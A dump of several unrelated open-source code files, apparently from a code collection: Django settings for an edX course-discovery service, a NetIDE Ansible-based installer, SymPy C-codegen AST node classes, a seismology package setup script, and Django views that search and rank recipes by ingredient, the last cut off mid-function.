'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s %(levelname)s %(process)d [%(name)s] %(pathname)s:%(lineno)d - %(message)s',
},
'syslog_format': {'format': syslog_format},
},
'handlers': {
'console': {
'level': level,
'class': 'logging.StreamHandler',
'formatter': 'standard',
'stream': 'ext://sys.stdout',
},
'local': {
'level': level,
'class': 'logging.handlers.SysLogHandler',
'address': syslog_address,
'formatter': 'syslog_format',
'facility': SysLogHandler.LOG_LOCAL0,
},
},
'loggers': {
'django': {
'handlers': ['console', 'local'],
'propagate': True,
'level': 'INFO'
},
'requests': {
'handlers': ['console', 'local'],
'propagate': True,
'level': 'WARNING'
},
'factory': {
'handlers': ['console', 'local'],
'propagate': True,
'level': 'WARNING'
},
'elasticsearch': {
'handlers': ['console', 'local'],
'propagate': True,
'level': 'WARNING'
},
'urllib3': {
'handlers': ['console', 'local'],
'propagate': True,
'level': 'WARNING'
},
'django.request': {
'handlers': ['console', 'local'],
'propagate': True,
'level': 'WARNING'
},
'': {
'handlers': ['console', 'local'],
'level': 'DEBUG',
'propagate': False
},
}
}
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'edx_rest_framework_extensions.auth.jwt.authentication.JwtAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.BasicAuthentication',
),
'DEFAULT_PAGINATION_CLASS': 'course_discovery.apps.api.pagination.PageNumberPagination',
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.DjangoModelPermissions',
),
'PAGE_SIZE': 20,
'TEST_REQUEST_RENDERER_CLASSES': (
'rest_framework.renderers.MultiPartRenderer',
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_THROTTLE_CLASSES': (
'course_discovery.apps.core.throttles.OverridableUserRateThrottle',
),
'DEFAULT_THROTTLE_RATES': {
'user': '100/hour',
},
'DEFAULT_SCHEMA_CLASS': 'rest_framework.schemas.coreapi.AutoSchema'
}
# http://chibisov.github.io/drf-extensions/docs/
REST_FRAMEWORK_EXTENSIONS = {
'DEFAULT_CACHE_ERRORS': False,
'DEFAULT_CACHE_RESPONSE_TIMEOUT': None,
'DEFAULT_LIST_CACHE_KEY_FUNC': 'course_discovery.apps.api.cache.timestamped_list_key_constructor',
'DEFAULT_OBJECT_CACHE_KEY_FUNC': 'course_discovery.apps.api.cache.timestamped_object_key_constructor',
}
# NOTE (CCB): JWT_SECRET_KEY is intentionally not set here to avoid production releases with a public value.
# Set a value in a downstream settings file.
JWT_AUTH = {
'JWT_ALGORITHM': 'HS256',
'JWT_AUDIENCE': 'course-discovery',
'JWT_ISSUER': [
{
'AUDIENCE': 'SET-ME-PLEASE',
'ISSUER': 'http://127.0.0.1:8000/oauth2',
'SECRET_KEY': 'SET-ME-PLEASE'
}
],
'JWT_DECODE_HANDLER': 'edx_rest_framework_extensions.auth.jwt.decoder.jwt_decode_handler',
'JWT_VERIFY_AUDIENCE': False,
'JWT_AUTH_COOKIE': 'edx-jwt-cookie',
'JWT_PUBLIC_SIGNING_JWK_SET': None,
'JWT_AUTH_COOKIE_HEADER_PAYLOAD': 'edx-jwt-cookie-header-payload',
'JWT_AUTH_COOKIE_SIGNATURE': 'edx-jwt-cookie-signature',
'JWT_AUTH_HEADER_PREFIX': 'JWT',
}
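# Illustrative sketch (added for clarity, not part of the original settings):
# a downstream, environment-specific settings file would typically replace the
# placeholder issuer values above, for example:
#
#     JWT_AUTH['JWT_ISSUER'] = [{
#         'AUDIENCE': 'course-discovery',
#         'ISSUER': 'https://lms.example.com/oauth2',
#         'SECRET_KEY': os.environ['JWT_SECRET_KEY'],
#     }]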
SWAGGER_SETTINGS = {
'DOC_EXPANSION': 'list',
}
SYNONYMS_MODULE = 'course_discovery.settings.synonyms'
# Paginate the django queryset used to populate the index with the specified size
# (by default it uses the database driver's default setting)
# https://docs.djangoproject.com/en/3.1/ref/models/querysets/#iterator
# Thus set the 'chunk_size'
ELASTICSEARCH_DSL_QUERYSET_PAGINATION = 5000
# Defining default pagination for all requests to ElasticSearch,
# whose parameters 'size' and 'from' are not explicitly set.
ELASTICSEARCH_DSL_LOAD_PER_QUERY = 5000
ELASTICSEARCH_DSL = {
'default': {'hosts': '127.0.0.1:9200'}
}
ELASTICSEARCH_INDEX_NAMES = {
'course_discovery.apps.course_metadata.search_indexes.documents.course': 'course',
'course_discovery.apps.course_metadata.search_indexes.documents.course_run': 'course_run',
'course_discovery.apps.course_metadata.search_indexes.documents.person': 'person',
'course_discovery.apps.course_metadata.search_indexes.documents.program': 'program',
}
ELASTICSEARCH_DSL_INDEX_SETTINGS = {'number_of_shards': 1, 'number_of_replicas': 1}
# We do not use the RealtimeSignalProcessor here to avoid overloading our
# Elasticsearch instance when running the refresh_course_metadata command
# If you still want to use please use customized RealTimeSignalProcessor
# course_discovery.apps.course_metadata.search_indexes.signals.RealTimeSignalProcessor
ELASTICSEARCH_DSL_SIGNAL_PROCESSOR = 'django_elasticsearch_dsl.signals.BaseSignalProcessor'
ELASTICSEARCH_DSL_INDEX_RETENTION_LIMIT = 3
# Update Index Settings
# Make sure the size of the new index does not change by more than this percentage
INDEX_SIZE_CHANGE_THRESHOLD = .1
# Elasticsearch search query facet "size" option to increase from the default value of "100"
# See https://www.elastic.co/guide/en/elasticsearch/reference/7.8/search-aggregations-metrics-percentile-aggregation.html
SEARCH_FACET_LIMIT = 10000
# Precision settings for the elasticsearch cardinality aggregations used to compute distinct hit and facet counts.
# The elasticsearch cardinality aggregation is not guaranteed to produce accurate results. Accuracy is configurable via
# an optional precision_threshold setting. Cardinality aggregations for queries that produce fewer results than the
# precision threshold can be expected to be pretty accurate. Cardinality aggregations for queries that produce more
# results than the precision_threshold will be less accurate. Setting a higher value for precision_threshold requires
# a memory tradeoff of roughly precision_threshold * 8 bytes. See the elasticsearch docs for more details:
# https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-metrics-cardinality-aggregation.html
#
# We use a higher value for hit precision than for facet precision for two reasons:
# 1.) The hit count is more visible to users than the facet counts.
# 2.) The performance penalty for having a higher hit precision is less than the penalty for a higher facet
# precision, since the hit count only requires a single aggregation.
DISTINCT_COUNTS_HIT_PRECISION = 1500
DISTINCT_COUNTS_FACET_PRECISION = 250
DEFAULT_PARTNER_ID = None
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
# edx-django-sites-extensions will fallback to this site if we cannot identify the site from the hostname.
SITE_ID = 1
TAGGIT_CASE_INSENSITIVE = True
# django-solo configuration (https://github.com/lazybird/django-solo#settings)
SOLO_CACHE = 'default'
SOLO_CACHE_TIMEOUT = 3600
ENABLE_PUBLISHER = False # either old (publisher djangoapp) or new (frontend-app-publisher)
PUBLISHER_FROM_EMAIL = None
USERNAME_REPLACEMENT_WORKER = "REPLACE WITH VALID USERNAME"
# If no upgrade deadline is specified for a course run seat, when the course is published the deadline will default to
# the course run end date minus the specified number of days.
PUBLISHER_UPGRADE_DEADLINE_DAYS = 10
# Django Debug Toolbar settings
# http://django-debug-toolbar.readthedocs.org/en/latest/installation.html
if os.environ.get('ENABLE_DJANGO_TOOLBAR', False):
INSTALLED_APPS += [
'debug_toolbar',
'elastic_panel',
]
MIDDLEWARE += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
DEBUG_TOOLBAR_PATCH_SETTINGS = False
DEBUG_TOOLBAR_PANELS = [
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.staticfiles.StaticFilesPanel',
'debug_toolbar.panels.templates.TemplatesPanel',
'debug_toolbar.panels.cache.CachePanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar.panels.redirects.RedirectsPanel',
'elastic_panel.panel.ElasticDebugPanel'
]
AWS_SES_REGION_ENDPOINT = "email.us-east-1.amazonaws.com"
AWS_SES_REGION_NAME = "us-east-1"
CORS_ORIGIN_WHITELIST = []
CSRF_COOKIE_SECURE = False
ELASTICSEARCH_CLUSTER_URL = "http://127.0.0.1:9200/"
EMAIL_BACKEND = "django_ses.SESBackend"
EMAIL_HOST = "localhost"
EMAIL_HOST_PASSWORD = ""
EMAIL_HOST_USER = ""
EMAIL_PORT = 25
EMAIL_USE_TLS = False
EXTRA_APPS = []
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
STATICFILES_STORAGE = "django.contrib.staticfiles.storage.StaticFilesStorage"
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
EDX_DRF_EXTENSIONS = {
"OAUTH2_USER_INFO_URL": "http://127.0.0.1:8000/oauth2/user_info"
}
API_ROOT = None
MEDIA_STORAGE_BACKEND = {
'DEFAULT_FILE_STORAGE': 'django.core.files.storage.FileSystemStorage',
'MEDIA_ROOT': MEDIA_ROOT,
'MEDIA_URL': MEDIA_URL
}
# Settings related to the taxonomy_support
TAXONOMY_COURSE_METADATA_PROVIDER = 'course_discovery.apps.taxonomy_support.providers.DiscoveryCourseMetadataProvider'
# Settings related to the EMSI client
EMSI_API_ACCESS_TOKEN_URL = 'https://auth.emsicloud.com/connect/token'
EMSI_API_BASE_URL = 'https://emsiservices.com'
EMSI_CLIENT_ID = ''
EMSI_CLIENT_SECRET = ''
################################### BEGIN CELERY ###################################
# Message configuration
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_COMPRESSION = 'gzip'
CELERY_RESULT_COMPRESSION = 'gzip'
# Results configuration
CELERY_TASK_IGNORE_RESULT = False
CELERY_TASK_STORE_ERRORS_EVEN_IF_IGNORED = True
# Events configuration
CELERY_TASK_TRACK_STARTED = True
CELERY_WORKER_SEND_TASK_EVENTS = True
CELERY_TASK_SEND_SENT_EVENT = True
# Prevent Celery from removing handlers on the root logger. Allows setting custom logging handlers.
CELERY_WORKER_HIJACK_ROOT_LOGGER = False
CELERY_TASK_DEFAULT_EXCHANGE = 'discovery'
CELERY_TASK_DEFAULT_ROUTING_KEY = 'discovery'
CELERY_TASK_DEFAULT_QUEUE = 'discovery.default'
# Celery Broker
CELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL', '')
CELERY_TASK_ALWAYS_EAGER = False
################################### END CELERY ###################################
FIRE_UPDATE_COURSE_SKILLS_SIGNAL = False
| agpl-3.0 | -2,374,468,131,660,770,000 | 33.049679 | 122 | 0.687391 | false |
fp7-netide/Engine | loader/loader/installer.py | 1 | 8381 | """
Copyright (c) 2015, NetIDE Consortium (Create-Net (CN), Telefonica Investigacion Y Desarrollo SA (TID), Fujitsu
Technology Solutions GmbH (FTS), Thales Communications & Security SAS (THALES), Fundacion Imdea Networks (IMDEA),
Universitaet Paderborn (UPB), Intel Research & Innovation Ireland Ltd (IRIIL), Fraunhofer-Institut für
Produktionstechnologie (IPT), Telcaria Ideas SL (TELCA) )
All rights reserved. This program and the accompanying materials
are made available under the terms of the Eclipse Public License v1.0
which accompanies this distribution, and is available at
http://www.eclipse.org/legal/epl-v10.html
Authors:
Gregor Best, [email protected]
"""
import json
import logging
import os
import platform
import requests
import stat
import subprocess as sp
import sys
import tempfile
from subprocess import call
from loader import environment
from loader import util
from loader.package import Package
# XXX make this configurable
install_package_command = "sudo apt-get install --yes {}"
class InstallException(Exception): pass
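# Illustrative note (added for clarity, not part of the original module): the
# loader would typically drive the two entry points below with a package path
# and a data directory, e.g.
#     do_server_install('/tmp/netide-app-package')
#     do_client_installs('/tmp/netide-app-package', '/var/lib/netide')
# Both paths are hypothetical; the calls assume the passwordless SSH and sudo
# access described in the do_client_installs docstring.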
def do_server_install(pkg):
logging.debug("Doing server install for '{}' now".format(pkg))
prefix = os.path.expanduser("~")
with util.TempDir("netide-server-install") as t:
p = Package(pkg, t)
if not p.load_apps_and_controller():
logging.error("There's something wrong with the package")
return 2
call(["./virtualEnv_Ansible_Install.sh"])
if "server" not in p.config:
raise InstallException('"server" section missing from configuration!')
conf = p.config["server"]
util.editPlaybookServer(conf)
if "host" in conf and platform.node() != conf["host"] and conf["host"] != "localhost":
raise InstallException("Attempted server installation on host {} (!= {})".format(platform.node(), conf["host"]))
# with open("Playbook_Setup/sever.yml", "w") as serverYml:
# serverYml.write("--- \n - name: install prereq for all hosts \n hosts: localhost \n roles: - prereq - core \n ...")
#install core and engine on server (usually localhost)
#read p.config[server] and add server to site.yml
call(["ansibleEnvironment/bin/ansible-playbook", "-v", os.path.join("Playbook_Setup", "siteServer.yml")])
#Check the rest of system requirements
logging.debug("Checking system requirements for {}".format(pkg))
if not p.check_no_hw_sysreq():
logging.error("Requirements for package {} not met".format(pkg))
return 2
def do_client_installs(pkgpath, dataroot):
"Dispatches installation requests to client machines after gaining a foothold on them. Requires passwordless SSH access to \
client machines and passwordless root via sudo on client machines"
with util.TempDir("netide-client-installs") as t:
pkg = Package(pkgpath, t)
if not pkg.load_apps_and_controller():
logging.error("There's something wrong with the package")
return 2
clients = pkg.get_clients()
#controller = pkg.controllers
#print("controller: ")
#print(controller)
#for n in controller:
# print("instance of controller: ")
# print(n)
# for i in controller[n]:
# print(i)
util.editPlaybookClient(pkg)
util.spawn_logged(["ansibleEnvironment/bin/ansible-playbook", "-v", os.path.join("Playbook_Setup", "siteClient.yml")])
#===============================================================================
# util.write_ansible_hosts(clients, os.path.join(t, "ansible-hosts"))
#
# tasks = []
#
# # Can't use `synchronize' here because that doesn't play nice with ssh options
# tasks.append({
# "name": "Copy NetIDE loader",
# "copy": {
# "dest": '{{ansible_user_dir}}/netide-loader-tmp',
# "src" : os.getcwd()}})
#
# # We need to do this dance because `copy' copies to a subdir unless
# # `src' ends with a '/', in which case it doesn't work at all (tries
# # to write to '/' instead)
# tasks.append({
# "shell": "mv {{ansible_user_dir}}/netide-loader-tmp/loader {{ansible_user_dir}}/netide-loader",
# "args": {"creates": "{{ansible_user_dir}}/netide-loader"}})
# tasks.append({"file": {"path": "{{ansible_user_dir}}/netide-loader-tmp", "state": "absent"}})
# tasks.append({"file": {"path": "{{ansible_user_dir}}/netide-loader/netideloader.py", "mode": "ugo+rx"}})
#
# tasks.append({
# "name": "Bootstrap NetIDE loader",
# "shell": "bash ./setup.sh",
# "args": { "chdir": "{{ansible_user_dir}}/netide-loader" }})
#
# #is already cloned...
# tasks.append({
# "name": "Clone IDE repository",
# "git": {
# "repo": "http://github.com/fp7-netide/IDE.git",
# "dest": "{{ansible_user_dir}}/IDE",
# "version": "development"}})
#
# #has been done in setup server
# tasks.append({
# "name": "Install Engine",
# "shell": "bash {{ansible_user_dir}}/IDE/plugins/eu.netide.configuration.launcher/scripts/install_engine.sh"})
# #add creates:
# tasks.append({
# "file": {
# "path": dataroot,
# "state": "directory"}})
#
# tasks.append({
# "name": "Register Package checksum",
# "copy": {
# "content": json.dumps({"cksum": pkg.cksum}, indent=2),
# "dest": os.path.join(dataroot, "controllers.json")}})
#
# playbook = [{"hosts": "clients", "tasks": tasks}]
#
# #use new role system here !
# for c in clients:
#
# ctasks = []
#
# apps = []
# # Collect controllers per client machine and collect applications
# for con in pkg.controllers_for_node(c[0]):
# apps.extend(con.applications)
# cname = con.__name__.lower()
# if cname not in ["ryu", "floodlight", "odl", "pox", "pyretic"]:
# raise InstallException("Don't know how to install controller {}".format(cname))
#
# script = ["{{ansible_user_dir}}", "IDE", "plugins", "eu.netide.configuration.launcher", "scripts"]
# script.append("install_{}.sh".format(cname))
#
# ctasks.append({
# "name": "install controller {}".format(cname),
# "shell": "bash {}".format(os.path.join(*script)),
# "args": {"chdir": "{{ansible_user_dir}}"}})
#
# # Install application dependencies
# # XXX: ugly :/
# # XXX: libraries
# for a in apps:
# reqs = a.metadata.get("requirements", {}).get("Software", {})
#
# # Languages
# for l in reqs.get("Languages", {}):
# if l["name"] == "python":
# if l["version"].startswith("3"):
# l["name"] += "3"
# else:
# l["name"] += "2"
# elif l["name"] == "java":
# if "7" in l["version"]:
# l["name"] = "openjdk-7-jdk"
# elif "8" in l["version"]:
# l["name"] = "openjdk-8-jdk"
# else:
# l["name"] = "openjdk-6-jdk"
#
# ctasks.append({
# "name": "install {} (for app {})".format(l["name"], str(a)),
# "apt": {"pkg": "{}={}*".format(l["name"], l["version"])}})
# playbook.append({"hosts": c[0], "tasks": ctasks})
#
# # A valid JSON-document is also valid YAML, so we can take a small shortcut here
# with open(os.path.join(t, "a-playbook.yml"), "w") as ah:
# json.dump(playbook, ah, indent=2)
# print(playbook)
# util.spawn_logged(["ansibleEnvironment/bin/ansible-playbook", "-v", "-i", os.path.join(t, "ansible-hosts"), os.path.join(t, "a-playbook.yml")])
#===============================================================================
| epl-1.0 | -2,557,839,773,706,332,700 | 41.323232 | 153 | 0.540692 | false |
wxgeo/geophar | wxgeometrie/sympy/codegen/cnodes.py | 3 | 2498 | """
AST nodes specific to the C family of languages
"""
from sympy.core.basic import Basic
from sympy.core.compatibility import string_types
from sympy.core.containers import Tuple
from sympy.core.sympify import sympify
from sympy.codegen.ast import Attribute, Declaration, Node, String, Token, Type, none, FunctionCall
void = Type('void')
restrict = Attribute('restrict') # guarantees no pointer aliasing
volatile = Attribute('volatile')
static = Attribute('static')
def alignof(arg):
""" Generate of FunctionCall instance for calling 'alignof' """
return FunctionCall('alignof', [String(arg) if isinstance(arg, string_types) else arg])
def sizeof(arg):
""" Generate of FunctionCall instance for calling 'sizeof'
Examples
========
>>> from sympy.codegen.ast import real
>>> from sympy.codegen.cnodes import sizeof
>>> from sympy.printing.ccode import ccode
>>> ccode(sizeof(real))
'sizeof(double)'
"""
return FunctionCall('sizeof', [String(arg) if isinstance(arg, string_types) else arg])
class CommaOperator(Basic):
""" Represents the comma operator in C """
def __new__(cls, *args):
return Basic.__new__(cls, *[sympify(arg) for arg in args])
class Label(String):
""" Label for use with e.g. goto statement.
Examples
========
>>> from sympy.codegen.cnodes import Label
>>> from sympy.printing.ccode import ccode
>>> print(ccode(Label('foo')))
foo:
"""
class goto(Token):
""" Represents goto in C """
__slots__ = ['label']
_construct_label = Label
class PreDecrement(Basic):
""" Represents the pre-decrement operator
Examples
========
>>> from sympy.abc import x
>>> from sympy.codegen.cnodes import PreDecrement
>>> from sympy.printing.ccode import ccode
>>> ccode(PreDecrement(x))
'--(x)'
"""
nargs = 1
class PostDecrement(Basic):
""" Represents the post-decrement operator """
nargs = 1
class PreIncrement(Basic):
""" Represents the pre-increment operator """
nargs = 1
class PostIncrement(Basic):
""" Represents the post-increment operator """
nargs = 1
class struct(Node):
""" Represents a struct in C """
__slots__ = ['name', 'declarations']
defaults = {'name': none}
_construct_name = String
@classmethod
def _construct_declarations(cls, args):
return Tuple(*[Declaration(arg) for arg in args])
class union(struct):
""" Represents a union in C """
| gpl-2.0 | 1,761,598,395,251,997,700 | 22.566038 | 99 | 0.651321 | false |
ezietsman/seismo | setup.py | 1 | 1041 | from numpy.distutils.core import Extension
f90periodogram = Extension(name='f90periodogram',
sources=['seismo/src/periodogram.f90'],
extra_f90_compile_args=["-fopenmp", "-lgomp"],
extra_link_args=["-lgomp"])
if __name__ == "__main__":
from numpy.distutils.core import setup
setup(name='seismo_blobs',
description="Compiled sources for use with seismo",
author="Ewald Zietsman",
author_email="[email protected]",
ext_modules=[f90periodogram]
)
# Now seismo
import setuptools
setuptools.setup(
name="seismo",
version="0.2",
packages=setuptools.find_packages(),
install_requires=['numpy>=1.9'],
# metadata for upload to PyPI
author="Ewald Zietsman",
author_email="[email protected]",
description="Timeseries stuff for asteroseismology",
license="MIT",
keywords="time series frequency",
)
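# Illustrative note (added for clarity, not part of the original file): with a
# Fortran compiler such as gfortran available, the extension declared above is
# typically built in place with
#     python setup.py build_ext --inplace
# after which the compiled routines can be imported as `f90periodogram`.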
| mit | 5,087,803,322,496,857,000 | 29.617647 | 73 | 0.580211 | false |
Anushi/inhousemenu | search_recipes/views.py | 1 | 14147 | import operator
from django.shortcuts import render
from django.http import HttpResponse
from .models import RecipeList, RecipeIngredient, RecipeContent2, IngredientList
from django.db.models import Q
import itertools
# Create your views here.
def search_recipes_form(request):
ingredients_name_list = IngredientList.objects.all()
#print ingredients_name_list
for i in ingredients_name_list:
print i.ingredient_name
return render(request, 'search_form.html',
{'ingredients_name_list': ingredients_name_list
})
def search_recipes(request):
search_list = []
search_list_temp = []
checks_list = []
split_q_nonull = []
split_q_nonull2 = []
delete_list = []
other_list = []
q2=""
ingredients_name_list = IngredientList.objects.all()
if request.method == 'GET':
if request.GET.getlist('checks[]'):
checks_list = request.GET.getlist('checks[]')
search_list_temp.extend(checks_list)
if request.GET.getlist('other'):
other_list = request.GET.getlist('other')
search_list_temp.extend(other_list)
print "====== other_list ======"
print other_list
if request.GET.getlist('add'):
add_list = request.GET.getlist('add')
search_list_temp.extend(add_list)
print "====== add_list ======"
print add_list
"""if 'q' in request.GET:
q = request.GET['q']
q_encode=q.encode('utf8')
split_q = q_encode.split(",")
split_q_nonull = [x for x in split_q if x]
search_list_temp.extend(split_q_nonull)
print "====== Q ======"
print q"""
if 'q2' in request.GET:
q2 = request.GET['q2']
q_encode2=q2.encode('utf8')
split_q2 = q_encode2.split(",")
split_q_nonull2 = [x for x in split_q2 if x]
search_list_temp.extend(split_q_nonull2)
print "**** Q2 ****"
print q2
if 'delete' in request.GET:
delete_list = request.GET.getlist('delete')
print "-- DEL LIST --"
print delete_list
#for d in delete_list:
# search_list.remove(d)
for s in search_list_temp:
search_list.append(s.lower())
print "-- search_list -- "
print search_list
recipe_ingredients_table = RecipeIngredient.objects.filter(reduce(lambda x, y: x | y, [Q(ingredient__contains=word) for word in search_list]))
recipe_list = []
for r in recipe_ingredients_table:
recipe_list.append(r.recipe_name)
recipe_list_unique = list(set(recipe_list))
recipe_name_table = RecipeList.objects.filter(reduce(lambda x, y: x | y, [Q(recipe_name__iexact=word) for word in recipe_list_unique]))
######### RANKING RECIPES ######################
recipe_content = RecipeContent2.objects.filter(reduce(lambda x, y: x | y, [Q(recipe_name__iexact=word) for word in recipe_list_unique]))
search_set = set(search_list)
print " == SEARCH SET =="
print search_set
s_len = len(search_set)
rank_dic = {}
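    # Rank each recipe by the largest subset of the searched ingredients that
    # appears in its content: subset sizes grow through the loop below, so the
    # value finally stored for each recipe is its best (largest) match count.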
#for i in xrange(s_len, 0, -1):
for i in range(1, s_len+1):
subsets = set(itertools.combinations(search_set, i))
for x in subsets:
recipe_content_rankwise = recipe_content.filter(reduce(lambda x, y: x | y, [Q(content__contains=word) for word in x]))
qs = recipe_content.filter(reduce(operator.and_, (Q(content__contains=word) for word in x)))
for temp in qs:
rank_dic[temp.recipe_name] = i
#print "--- RANK DICTIONARY --"
sorted_rank_dic = sorted(rank_dic.items(), key=operator.itemgetter(1), reverse=True)
#print sorted_rank_dic
######### END RANKING RECIPES ######################
##########################################################
# Meal type - main, entree, soups, desserts, congee, etc
recipe_name_mealtype_table = []
meal_type = []
meal_type_list = []
if request.GET.getlist('meal_type'):
meal_type = request.GET.getlist('meal_type')
if meal_type[0] == "Desserts":
meal_type_list.append("dessert")
elif meal_type[0] == "Soups":
meal_type_list.append("soup")
elif meal_type[0] == "Congee":
meal_type_list.append("congee")
elif meal_type[0] == "Entree + Main":
meal_type_list.append("entree")
meal_type_list.append("main")
elif meal_type[0] == "All":
meal_type_list.append("entree")
meal_type_list.append("soup")
meal_type_list.append("congee")
meal_type_list.append("main")
meal_type_list.append("dessert")
meal_type_list.append("")
#recipe_name_mealtype_table = recipe_name_table.filter(reduce(lambda x, y: x | y, [Q(category__iexact=word) for word in meal_type_list]))
else:
meal_type_list.append("entree")
meal_type_list.append("soup")
meal_type_list.append("congee")
meal_type_list.append("main")
meal_type_list.append("dessert")
meal_type_list.append("")
recipe_name_mealtype_table = recipe_name_table.filter(reduce(lambda x, y: x | y, [Q(category__iexact=word) for word in meal_type_list]))
##########################################################
# Cuisine type - Australian, Chinese, Indian, etc
recipe_name_cuisinetype_table = []
cuisine_type = []
cuisine_type_list = []
if request.GET.getlist('cuisine_type'):
cuisine_type = request.GET.getlist('cuisine_type')
if cuisine_type[0] == "Australian":
cuisine_type_list.append("Australian")
elif cuisine_type[0] == "Chinese":
cuisine_type_list.append("Chinese")
elif cuisine_type[0] == "Indian":
cuisine_type_list.append("Indian")
elif cuisine_type[0] == "All":
cuisine_type_list.append("Australian")
cuisine_type_list.append("Chinese")
cuisine_type_list.append("Indian")
#recipe_name_cuisinetype_table = recipe_name_mealtype_table.filter(reduce(lambda x, y: x | y, [Q(recipe_type__iexact=word) for word in cuisine_type_list]))
else:
cuisine_type_list.append("Australian")
cuisine_type_list.append("Chinese")
cuisine_type_list.append("Indian")
recipe_name_cuisinetype_table = recipe_name_mealtype_table.filter(reduce(lambda x, y: x | y, [Q(recipe_type__iexact=word) for word in cuisine_type_list]))
# Flavour type - Mixed, Spicy & Flavor, Thick & Creamy etc
recipe_name_tastetype_table = []
taste_type = []
taste_type_list = []
if request.GET.getlist('taste[]'):
taste_type = request.GET.getlist('taste[]')
print "*********"
print taste_type
if "spicy&hot" in taste_type:
taste_type_list.append("spicy&hot")
elif "thick&creamy" in taste_type:
taste_type_list.append("thick&creamy")
elif "light&refresh" in taste_type:
taste_type_list.append("light&refresh")
elif "crispy&crunchy" in taste_type:
taste_type_list.append("crispy&crunchy")
elif "mixed" in taste_type:
taste_type_list.append("spicy&hot")
taste_type_list.append("thick&creamy")
taste_type_list.append("light&refresh")
taste_type_list.append("")
recipe_name_tastetype_table = recipe_name_cuisinetype_table.filter(reduce(lambda x, y: x | y, [Q(taste__iexact=word) for word in taste_type_list]))
#CATEGORY
main_recipes_table = recipe_name_tastetype_table.filter(category__iexact="main")
entree_recipes_table = recipe_name_tastetype_table.filter(category__iexact="entree")
dessert_recipes_table = recipe_name_tastetype_table.filter(category__iexact="dessert")
soup_recipes_table = recipe_name_tastetype_table.filter(category__iexact="soup")
congee_recipes_table = recipe_name_tastetype_table.filter(category__iexact="congee")
main_rank_dictionary = {}
for m in main_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
main_rank_dictionary[recp] = rank_dic[recp]
sorted_main_rank_dic = sorted(main_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
entree_rank_dictionary = {}
for m in entree_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
entree_rank_dictionary[recp] = rank_dic[recp]
sorted_entree_rank_dic = sorted(entree_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
dessert_rank_dictionary = {}
for m in dessert_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
dessert_rank_dictionary[recp] = rank_dic[recp]
sorted_dessert_rank_dic = sorted(dessert_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
soup_rank_dictionary = {}
for m in soup_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
soup_rank_dictionary[recp] = rank_dic[recp]
sorted_soup_rank_dic = sorted(soup_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
congee_rank_dictionary = {}
for m in congee_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
congee_rank_dictionary[recp] = rank_dic[recp]
sorted_congee_rank_dic = sorted(congee_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
return render(request, 'search_results.html',
{'ingredients_name_list': ingredients_name_list,
'checks_list': checks_list,
'recipe_name_table': recipe_name_table,
'recipe_name_tastetype_table': recipe_name_tastetype_table,
'meal_type': meal_type,
'cuisine_type': cuisine_type,
'taste_type': taste_type,
'q2': q2,
'search_set':search_set,
'delete_list':delete_list,
'other_list':other_list,
'sorted_main_rank_dic':sorted_main_rank_dic,
'sorted_entree_rank_dic':sorted_entree_rank_dic,
'sorted_dessert_rank_dic':sorted_dessert_rank_dic,
'sorted_soup_rank_dic':sorted_soup_rank_dic,
'sorted_congee_rank_dic':sorted_congee_rank_dic
})
#message = 'Hello Anushi'
#return HttpResponse(message)
def search_recipes_copy(request):
#if 'q' in request.GET:
# message = 'You searched for: %r' % request.GET['q']
#else:
# message = 'You submitted an empty form.'
#return HttpResponse(message)
request_temp = request
message = "Hello"
if request.method == 'GET':
message = 'Welcome'
search_list = []
taste_search_list = []
checks_list = []
if request.GET.getlist('checks[]'):
checks_list = request.GET.getlist('checks[]')
search_list.extend(checks_list)
print "#############################"
print checks_list
if request.GET['q']:
q = request.GET['q']
q_encode=q.encode('utf8')
split_q = q_encode.split(",")
split_q_nonull = [x for x in split_q if x]
search_list.extend(split_q_nonull)
if request.GET.getlist('taste[]'):
print "**** TASTE *****"
taste_list = request.GET.getlist('taste[]')
taste_search_list.extend(taste_list)
if "" in taste_search_list:
if 'spicy&hot' not in taste_search_list:
taste_search_list.append('spicy&hot')
if 'thick&creamy' not in taste_search_list:
taste_search_list.append('thick&creamy')
if 'light&refresh' not in taste_search_list:
taste_search_list.append('light&refresh')
if 'crispy&crunchy' not in taste_search_list:
taste_search_list.append('crispy&crunchy')
print taste_search_list
print "---------------------------"
recipe_ingredients_table = RecipeIngredient.objects.filter(reduce(lambda x, y: x | y, [Q(ingredient__contains=word) for word in search_list]))
recipe_list = []
for r in recipe_ingredients_table:
recipe_list.append(r.recipe_name)
recipe_list_unique = list(set(recipe_list))
recipe_name_table = RecipeList.objects.filter(reduce(lambda x, y: x | y, [Q(recipe_name__iexact=word) for word in recipe_list_unique]))
#TASTE
recipe_name_taste_table = recipe_name_table.filter(reduce(lambda x, y: x | y, [Q(taste__iexact=word) for word in taste_search_list]))
#CATEGORY
